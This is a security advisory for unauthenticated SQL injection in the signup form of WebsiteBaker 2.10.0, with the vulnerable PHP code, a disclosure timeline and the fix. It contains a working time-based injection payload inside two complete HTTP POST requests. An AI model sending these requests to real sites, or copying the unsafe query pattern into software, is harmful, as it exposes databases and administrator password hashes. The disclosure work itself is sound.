WebsiteBaker 2.10.0 and earlier versions are vulnerable to SQL injection.
WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS).
An unauthenticated user can inject SQL code through the “username” and “display_name” POST parameters of the signup form (the request is handled by “account/signup.php”; the vulnerable code is in “account/signup2.php”). The vulnerability exists because user-supplied data is concatenated into SQL queries without escaping or parameterization. By exploiting it, an attacker can read records stored in the database with the privileges of the WebsiteBaker database user, for example the administrator's password hash (MD5).
Vulnerable code:
account/signup2.php
40 $username = strtolower(strip_tags($wb->get_post('username'))); <-- user input
41 $display_name = strip_tags($wb->get_post('display_name')); <-- user input
...
50 // Check if username already exists
51 $sql = 'SELECT `user_id` FROM `'.TABLE_PREFIX.'users` WHERE `username` = \''.$username.'\''; <-- SQL injection no. 1
52 if ($database->get_one($sql)) {
53 $error[] = $MESSAGE['USERS_USERNAME_TAKEN']."\n";
54 }
55 if(!preg_match('/^[a-z]{1}[a-z0-9_-]{2,}$/i', $username)) {
56 $error[] = $MESSAGE['USERS_NAME_INVALID_CHARS']."\n";
57 }
58 $sql = 'SELECT COUNT(*) FROM `'.TABLE_PREFIX.'users` ';
59 $sql .= 'WHERE `display_name` LIKE \''.$display_name.'\''; <-- SQL injection no. 2
60 if ($database->get_one($sql) > 0) {
61 $error[] = $MESSAGE['USERS_DISPLAYNAME_TAKEN'].'';
The POST parameters “username” (line 40) and “display_name” (line 41) are concatenated unsanitized into the SQL strings passed to “get_one” (lines 52 and 60). strip_tags() only removes HTML tags and leaves single quotes intact, and the character whitelist check at line 55 runs only after the query at line 51 has already been executed, so neither prevents injection. No prepared statements or escaping are used.
framework/class.database.php
102 // Gets the first column of the first row
103 function get_one( $statement )
104 {
105 $fetch_row = mysqli_fetch_array(mysqli_query($this->db_handle, $statement) );
106 $result = $fetch_row[0];
107 $this->set_error(null);
108 if(mysqli_error($this->db_handle)) {
109 $this->set_error(mysqli_error($this->db_handle));
110 return null;
111 } else {
112 return $result;
113 }
114 }
SQL Injection no.1: parameter username
Payload: sql' OR SLEEP(5)-- 
POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184
action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134734&email-address=&name=&full_name=&username=sql' OR SLEEP(5)-- &display_name=test&email=test&captcha=&submit=Sign-up
The response is delayed by 5 seconds, showing that the injected SLEEP(5) was executed by the database.
SQL Injection no.2: parameter display_name
Payload: sql' OR SLEEP(5)-- 
POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184
action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134833&email-address=&name=&full_name=&username=test&display_name=sql' OR SLEEP(5)-- &email=test&captcha=&submit=Sign-up
The response is delayed by 5 seconds, showing that the injected SLEEP(5) was executed by the database.
Update to WebsiteBaker 2.10.1 or a newer version.
24.03.2017 Informed vendor about vulnerabilities
25.03.2017 Vendor confirms and releases fixes
03.04.2017 CVE assigned
07.04.2017 Disclosed to public
These vulnerabilities were discovered by Marek Alaksa from Citadelo.